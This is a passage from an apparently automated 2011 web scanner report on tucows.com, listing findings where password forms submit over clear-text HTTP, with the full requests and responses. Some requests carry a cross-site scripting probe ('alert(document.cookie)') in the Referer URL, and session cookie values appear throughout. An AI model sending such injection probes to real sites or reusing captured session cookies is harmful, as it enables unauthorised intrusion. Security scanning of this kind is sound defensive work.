Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.64. http://www.tucows.com/images/newassets/terms.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /images/newassets/terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.65. http://www.tucows.com/images/newassets/terms.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /images/newassets/terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.66. http://www.tucows.com/images/newassets/warningcow200.png  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/warningcow200.png

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /images/newassets/warningcow200.png HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:50:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.67. http://www.tucows.com/images/newassets/warningcow200.png  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/warningcow200.png

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /images/newassets/warningcow200.png HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:50:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.68. http://www.tucows.com/index.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.69. http://www.tucows.com/index.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.70. http://www.tucows.com/preview/194850/x22  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /preview/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4d4da9e3d2f2d2155bae3a5364759dbf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: 4d4da9e3d2f2d2155bae3a5364759dbf=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 74939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.71. http://www.tucows.com/preview/194850/x22  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /preview/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4d4da9e3d2f2d2155bae3a5364759dbf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: 4d4da9e3d2f2d2155bae3a5364759dbf=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 74939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.72. http://www.tucows.com/privacy.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /privacy.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 37121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.73. http://www.tucows.com/privacy.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /privacy.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 37121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.74. http://www.tucows.com/sitemap.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /sitemap.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 284258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.75. http://www.tucows.com/sitemap.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /sitemap.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 284258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.76. http://www.tucows.com/software.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /software.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
